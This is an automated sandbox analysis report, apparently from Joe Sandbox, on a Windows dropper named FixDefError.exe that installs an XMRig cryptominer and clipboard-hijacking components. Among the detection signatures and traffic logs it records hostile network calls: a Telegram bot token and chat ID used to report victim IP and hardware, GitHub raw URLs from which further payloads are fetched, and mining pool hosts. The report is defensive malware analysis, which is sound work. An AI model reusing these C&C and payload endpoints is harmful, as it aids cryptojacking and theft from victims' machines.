Windows Analysis Report
FixDefError.exe

Overview

General Information

Sample Name: FixDefError.exe
Analysis ID: 829697
MD5: 1b664f2a0bede6c47e44ca8c0aad3de7
SHA1: 2dc3169220411d03be438047a3c33696b4371d2b
SHA256: 908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9
Tags: exe
Infos:

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Modifies power options to not sleep / hibernate
Found strings related to Crypto-Mining
Modifies the hosts file
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates driver files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: FixDefError.exe ReversingLabs: Detection: 25%
Source: FixDefError.exe Virustotal: Detection: 39% Perma Link
Antivirus detection for dropped file
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe Avira: detection malicious, Label: HEUR/AGEN.1203240
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Avira: detection malicious, Label: HEUR/AGEN.1236409
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe ReversingLabs: Detection: 79%
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe ReversingLabs: Detection: 30%
Machine Learning detection for sample
Source: FixDefError.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Joe Sandbox ML: detected
Source: C:\ProgramData\RuntimeBrokerData\svhost.exe Joe Sandbox ML: detected
Source: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Joe Sandbox ML: detected

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED
Found strings related to Crypto-Mining
Source: svhost.exe.1.dr String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: svhost.exe.1.dr String found in binary or memory: cryptonight/0
Source: svhost.exe.1.dr String found in binary or memory: -o, --url=URL URL of mining server
Source: svhost.exe.1.dr String found in binary or memory: stratum+tcp://
Source: svhost.exe.1.dr String found in binary or memory: Usage: xmrig [OPTIONS]
Source: svhost.exe.1.dr String found in binary or memory: XMRig 6.17.0
Source: unknown HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
Source: FixDefError.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ImpulseWatch.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
Source: Binary string: ImpulseWatch.pdb|l source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
Source: Binary string: ProgramInstaller.pdb source: FixDefError.exe
Source: Binary string: Impulse.pdb source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
Source: Binary string: ImpulseClipper.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49696 -> 95.179.241.203:443
Source: Traffic Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49697 -> 95.179.241.203:443
Source: Traffic Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.3:62704 -> 8.8.8.8:53
Source: Traffic Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.3:49977 -> 8.8.8.8:53
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe DNS query: name: api.ipify.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.co
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.237.62.211 104.237.62.211
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1User-Agent: Mozilla/5.0Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49688 -> 443
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agfamonotype.
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comams
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: FixDefError.exe, 00000000.00000003.252976134.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comll
Source: FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comn
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ProgramStarter.exe, 00000001.00000003.255875959.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256014070.0000000007F12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com-s
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersJ
Source: FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersa
Source: ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersm
Source: ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designerss
Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com773.
Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comgr
Source: ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comgrita
Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257198214.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comi
Source: FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comicta
Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comll
Source: ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comt
Source: FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comueom8
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: FixDefError.exe, 00000000.00000003.252281963.0000000008682000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnTF
Source: ProgramStarter.exe, 00000001.00000003.257427275.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com
Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: FixDefError.exe, 00000000.00000003.254806233.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254862842.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254771694.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254676957.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254697046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254834071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254615093.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254648692.00000000086A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: FixDefError.exe, 00000000.00000003.251806993.0000000008685000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kreV
